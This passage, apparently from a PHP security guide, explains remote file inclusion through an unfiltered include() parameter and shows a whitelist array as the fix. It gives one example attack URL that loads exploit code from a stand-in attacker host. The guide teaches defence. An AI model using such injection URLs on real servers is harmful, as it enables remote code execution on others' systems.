If your server allows for remote files with include(), you could also inject
a file from another server, like http://example.com/template.php?
page=http://evilsite.net/exploitcode/2.txt?. Remember,
these text files will be executed as PHP inside your other PHP file and thus
have access to everything. A lot of them contain mass-mailers or check
your system for free space and upload options to store data.
In short: never, ever allow an unfiltered URI parameter to become part of a
URI that you load in PHP or print out as an href or src in the HTML.
Instead, use pointers:
1 <?php
2 $sites = array((^3) 'about'=>'about-us.php',
(^4) 'contact'=>'contact.php',
(^5) 'clients'=>'clients.php',
(^6) 'portfolio'=>'portfolio.php',
(^7) 'home'=>'index.php',
(^8) 'partners'=>'partners.php'
9 );
10 if( isset($_GET['page']) &&
(^11) isset($sites[$_GET['page']]) &&
(^12) file_exists($sites[$_GET['page']]) ){
(^13) include($sites[$_GET['page']]);
14 } else {
(^15) echo 'This page does not exist on this system.';
16 }
17 ?>
This way, the parameters become not a file name but a word. So, http://
example.com/template.php?page=about would include about-
us.php, http://example.com/template.php?page=home would